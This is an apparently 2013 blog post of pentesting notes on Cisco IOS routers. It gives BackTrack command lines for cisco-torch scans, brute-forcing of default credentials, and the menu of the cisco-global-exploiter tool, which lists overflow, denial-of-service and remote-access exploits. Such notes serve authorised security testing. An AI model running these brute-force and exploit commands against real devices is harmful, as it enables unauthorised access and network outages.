Wednesday, 11 September 2013

CISCO IOS Penetration Testing


CISCO Penetration testing, is very interesting topic, but could not find much information so decided to collect information while working on professional assignment, and write article so as to get work done easily in future.

Enumeration is the Key!!!...:) I know there may be much information out but for basic start this will be helpful..!

I will suggest to watch basic videos from Vivek Ramchandran from securitytube.net

Below are simple Notes & IMP commands, which may be helpful.

CISCO IOS Pentesting:

root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -A -t -s -u -n -j -w -z -c -F FILE_NAME

Bruteforce:

root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -b -t -F FILE_NAME

Checking X.X.X.X ...
Tryng cisco:Cisco
Fingerprint:                    2552511255251325525324255253311310
Description:                    Cisco IOS host (tested on 2611, 2950)
Fingerprinting Successful


2036:   Checking X.X.X.X ...
Fingerprint:                    2552511255251325525324255253311310
Description:                    Cisco IOS host (tested on 2611, 2950)
Fingerprinting Successful

2036:   Checking X.X.X.X ...
Fingerprint:                    2552511255251325525324255253311310
Description:                    Cisco IOS host (tested on 2611, 2950)
Fingerprinting Successful

Sometimes you may need to generate your own password list for brute forcing, for which you can use "crunch" from backtrack...

Password Generator:

root@bt:/pentest/passwords/crunch#     ;) You can check MAN Pages for more information on crunch!!

Scan for SSH:

root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -s -F FILE_NAME

1815:   Checking X.X.X.X ...
Cisco found by SSH banner SSH-1.88-Cisco-1.20

1812:   Checking X.X.X.X ...
Cisco found by SSH banner SSH-1.88-Cisco-1.20

Scan for TFTP:

root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -j -F FILE_NAME

1851:   Checking X.X.X.X ...
*** Found  TFTP server

2730:   Checking X.X.X.X ...
*** Found  TFTP server

Cisco IOS HTTP Authorization Vulnerability Scan

root@bt:/pentest/cisco/cisco-torch# ./cisco-torch.pl -z -F FILE_NAME

Scan for NTP:

root@bt# ./cisco-torch.pl -n -F FILE_NAME | grep "Found Cisco remote NTP host"
Found Cisco remote NTP host X.X.X.X
Found Cisco remote NTP host X.X.X.X
Found Cisco remote NTP host X.X.X.X
Found Cisco remote NTP host X.X.X.X

CGE Cisco Exploiter:

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

root@bt:/pentest/cisco/cisco-global-exploiter# ./cge.pl Number

Launch Graphical Hydra:
Path : /usr/share/applications
sh -c "xhydra"

1 comment:

  1. open vas vulnerability scanner is an open source scanner similer to nessus which is comercial version of this http://born2hack.hpage.com/open-vas-web-vulnerability-scanner_12672677.html

    ReplyDelete